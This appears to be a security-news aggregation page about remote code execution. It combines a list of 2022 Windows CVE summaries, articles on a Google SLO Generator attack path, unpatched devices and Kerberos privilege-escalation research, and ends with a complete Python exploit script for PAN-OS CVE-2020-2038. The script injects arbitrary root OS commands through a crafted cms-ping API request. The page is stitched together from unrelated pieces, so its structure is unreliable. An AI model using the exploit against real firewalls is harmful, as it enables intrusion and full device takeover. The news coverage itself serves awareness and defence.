Azure RTOS GUIX Studio Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-30175, CVE-2022-30176, CVE-2022-35773, CVE-2022-35779, CVE-2022-35806.

CVE-2022-34687

Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-34702, CVE-2022-34714, CVE-2022-35745, CVE-2022-35752, CVE-2022-35753, CVE-2022-35766, CVE-2022-35794.

CVE-2022-35767

Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-34702, CVE-2022-35745, CVE-2022-35752, CVE-2022-35753, CVE-2022-35766, CVE-2022-35767, CVE-2022-35794.

CVE-2022-34714

Windows Bluetooth Service Remote Code Execution Vulnerability.

CVE-2022-30144

Windows WebBrowser Control Remote Code Execution Vulnerability.

CVE-2022-30194

Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-35744.

CVE-2022-30133

Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-34702, CVE-2022-34714, CVE-2022-35745, CVE-2022-35752, CVE-2022-35753, CVE-2022-35766, CVE-2022-35767.

CVE-2022-35794

The finding exposes the danger of older, unpatched bugs, which plague at least 4.5 million devices.

A new vector to exploit a vulnerable version of Google SLO Generator has been uncovered, which facilitates remote code execution (RCE). It allows an attacker to gain access to the system and deploy malicious code as if it is coming from a trusted source inside the network.

Google SLO Generator is a widely used Python library used by engineers who want to track their Web API performance. The tool is used by thousands of Google services, but prior to a September 2021 patch, it housed unsafe and exploitable functions, potentially exposing user input data.

Michael Assraf, co-founder and CEO of Vicarius, explains that this path to exploitation was previously unknown and created a new way to exploit outdated versions for worse outcomes than simple information disclosure.

It is unknown how many of the more than 167,000 applications using this library are running vulnerable versions, according to Vicarius, which published a report detailing the attack path. Users who updated the code won't be exposed to this attack, but that said, unpatched vulnerabilities are still the most common way that companies are successfully attacked.

Assraf also raises the issue of potentially problematic workarounds as security researchers uncover new vectors to exploit vulnerable software instances. Developers will often use workarounds to protect against known exploits rather than deploying a systematic update/patch.

"Developers who fall into that category will be vulnerable to this new exploit — along with anyone else who has yet to deploy the patch," he says.

**Millions of Unpatched Devices Remain a Problem**

Externally accessible vulnerabilities expected to remain a favorite attack vector for cybercriminals in the future. A report published this week from Rezilion found vulnerabilities as old as a decade remain unpatched in software and Internet-connected devices.

The study identified more than 4.5 million Internet-facing devices that remain open to vulnerabilities discovered between 2010 to 2020. The report also identified active scanning/exploitation attempts in most of these vulnerabilities.

Yotam Perkal, director of vulnerability research at Rezilion, says there are multiple reasons why unpatched vulnerabilities are so common.

"First, many organizations with less mature security programs do not even have visibility into the vulnerabilities they have in their environment," he says. "Without the proper tooling and vulnerability management processes in place, they are basically blind to the risk and can't patch what they do not know about."

Second, even for organizations with mature vulnerability management processes in place, patching presents a challenge — it requires time and a considerable amount of effort and can often lead to unforeseen patch compatibility issues.

"With the constant rise in the number of new vulnerabilities discovered each year, organizations simply struggle to keep up," he explains.

**Unpatched Vulnerabilities a Top Security Issue**

Assraf calls unpatched vulnerabilities one of the most significant, prevalent, yet fixable security problems across the board — and for a multitude of reasons.

"This issue transcends industry and company size, although large enterprises are typically more susceptible due to sheer volume of systems and users in place," he adds.

He points out there are also new vulnerabilities cropping up daily, so managing "zero vulnerabilities" is a bit of a pipedream.

In addition, large-scale updates also occasionally break things and create unforeseen consequences and compatibility issues, leaving many to take a stance of "If it ain’t broke, don’t fix it."

"The problem is, it is broken, you just don't see the chink in the armor until you've been breached," Assraf warns. "Other common issues are around visibility, shadow IT, and distributed teams that lead to ownership complications."

From his perspective, visibility is the first step in getting vulnerabilities and patching under control, as you can’t fix what you don’t know is broken.

"Having an accurate and continuously updated asset inventory of all assets and devices in your environment is a critical first step," he explains.

Next is knowing how to prioritize the updates available to those systems and assets, which is a common place where enterprises fall short and the volume begins to become just noise.

Perkal says he thinks the key point to having a more proactive posture towards risks from unpatched vulnerabilities is awareness.

"Once you are aware of the risk, make sure you have the right processes and tools in place that will allow you to effectively take action," he says. "At the end of the day, applying an existing patch to a known vulnerability that is known to be exploited in the wild should be the easy aspect of proper security hygiene."

A July report from Palo Alto Networks' Unit 42 also suggested attackers play favorites when looking at which software vulnerabilities to target.

**Solving the Patching Problem With Business Context**

Assraf says it's common to prioritize based on criticality from the major frameworks like CVSS, which assign severity ratings to known vulnerabilities — several security vendors also assign their own black-box scoring systems.

"What's important to account for, and where this step — and vendors — often fall short, is a failure to take business context into account," he says.

It's important therefore to focus on the potential threats that will have the largest impact on your unique digital environment, not necessarily a third-party rating assigned without context.

"The most mature organizations will then automate the patching process based on said context, updating the most critical systems while minimizing downtime and impact through strategic scheduling of deployment," Assraf says.

Perkal points out that most of the code running in an organization comes from various third parties, whether open source or commercial.

"While this allows organizations to focus on their core business logic and release code faster, this also introduces a security risk in the form of software vulnerabilities," he says. "Patching everything simply isn't feasible."

He says to be able effectively to cope with the risk, attack surface management platforms that can intelligently prioritize the vulnerabilities that matter most, as well as help automate some of the mitigation and remediation aspects, can help address this risk.

"The most concerning aspect I drew from the research is these old, known, exploitable vulnerabilities are still so pervasive," he adds. "It's especially concerning since it is likely the same analysis we did is also being conducted by attackers, and by leaving this huge attack surface vulnerable, we are making their lives easy."

Researchers Debut Fresh RCE Vector for Common Google API Tool

Upcoming Black Hat USA presentation will examine the implications of Kerberos weaknesses for security on the local machine.

As the main authentication protocol for Windows enterprise networks, Kerberos has long been a favored hacking playground for security researchers and cybercriminals alike. While the focus has been on attacking Kerberos authentication to carry out remote exploits and aid in lateral movement across the network, new research explores how Kerberos can also be abused to great effect in carrying out a variety of local privilege escalation (LPE) attacks.

At the Black Hat USA conference this week in Las Vegas, James Forshaw, security researcher for Google Project Zero, and Nick Landers, head of adversarial R&D for NetSPI, plan to take the security discussion beyond the Kerberoasting and Golden/Silver ticket attack discussions that have dominated Kerberos security research in recent years. In the session "Elevating Kerberos to the Next Level," Forshaw and Landers will explore authentication bypasses, sandbox escapes, and arbitrary code execution in privileged processes.  

"James and I have both spent a lot of our time digging into Windows internals, and Kerberos is fundamental to network authentication between Windows systems. However, most of the existing research and tooling I've done focuses on remote exploitation — ignoring attack surfaces that exist on just a local machine," says Landers, who explained why the pair decided to dig deeper into design flaws in the way Kerberos does local authentication. "Through this, we've discovered many interesting flaws — some fixed and some not — that we're excited to share on Wednesday, along with the tooling we’ve built and knowledge we've gained over the last several months."

The tooling will help others in the security research community to inspect and manipulate Kerberos on local systems to build on the pair's research. The duo will also offer up some important detection and configuration advice to help security practitioners mitigate the risk of the flaws that they'll present.

From a bigger-picture perspective, Landers hopes that his talk can help bring further attention to Kerberos from the entire security world. He says that even though it is the recommended long-term solution for network authentication in Windows environment, replacing deprecated protocols like NetNTLM, security teams shouldn't assume that its more secure by default than the predecessors.

"Kerberos maintains an extremely large feature set, which continues to grow every year. Obscure functionality first designed in 1998, as well as brand-new code engineered for Windows 11, can both provide nuanced attack surfaces for LPE, security bypasses, or even RCE," he says. "Where there are more features to search, there is always greater opportunity to discover flaws."

In addition to offering practical mitigation steps, he hopes the talk will spur security and network administrators to brush up on their Kerberos knowledge to better harden their systems.

"Administrators should become more familiar with Kerberos to be able to apply best practice mitigations effectively. Specifically, since we consistently see the knowledge of attackers outpacing that of defenders when it comes to Kerberos internals," he says.

His talk will be one of several eye-opening identity and access management-related research presented at Black Hat this week. Some discussions up for exploration include how hybrid cloud IAM deployments are leaving open flaws and misconfigurations ripe for attack and the way that attackers can utilize stolen PII to make it easier to conduct smishing attacks.

Abusing Kerberos for Local Privilege Escalation

PAN-OS version 10.0 suffers from a remote code execution vulnerability.

    # Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-08-13# Exploit Author: UnD3sc0n0c1d0# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038# Category: Web Application# Version: <10.0.1, <9.1.4 and <9.0.10# Tested on: PAN-OS 10.0 - Parrot OS# CVE : CVE-2020-2038## Description:# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated # administrators to execute arbitrary OS commands with root privileges.# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.#!/usr/bin/env python3import requestsimport urllib3import sysimport getoptimport xmltodicturllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def banner():    print('\n###########################################################################')    print('# Proof of Concept for CVE-2020-2038                                      #')    print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of   #')    print('# Positive Technologies                                                   #')    print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #')    print('#                                                                         #')    print('#                           Exploit by: Juampa Rodríguez (@UnD3sc0n0c1d0) #')    print('###########################################################################')def exploit(target,user,password,command):    apiparam = {'type': 'keygen', 'user': user, 'password': password}    apiresponse = requests.get(target+'api/', params=apiparam, verify=False)    xmlparse = xmltodict.parse(apiresponse.content)    apikey = xmlparse['response']['result']['key']    payload = '<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||'+command+'||]]></pattern></cms-ping>'    parameters = {'cmd': payload, 'type': 'op', 'key': apikey}    response = requests.get(target+'api', params=parameters, verify=False)    print(response.text[50:-20])def usage():    print('\nusage: CVE-2020-2038.py\n\n')    print('arguments:')    print('     -h      show this help message and exit')    print('     -t      target URL (ex: http://vulnerable.host/)')    print('     -u      target administrator user')    print('     -p      pasword of the defined user account')    print('     -c      command you want to execute on the target\n')    def main(argv):    if len(sys.argv) < 9:        banner()        usage()        sys.exit()    try:        opts, args = getopt.getopt(argv,"ht:u:p:c:")    except getopt.GetoptError:        banner()        usage()        sys.exit()    for opt, arg in opts:        if opt == '-h':            usage()            sys.exit()        if opt == '-t':            target = arg        if opt == '-u':            user = arg        if opt == '-p':            password = arg        if opt == '-c':            command = arg    banner()    exploit(target,user,password,command)    sys.exit()if __name__ == "__main__":    try:        main(sys.argv[1:])    except KeyboardInterrupt:        print('Interrupted by users...')    except:        sys.exit()

Tag

#rce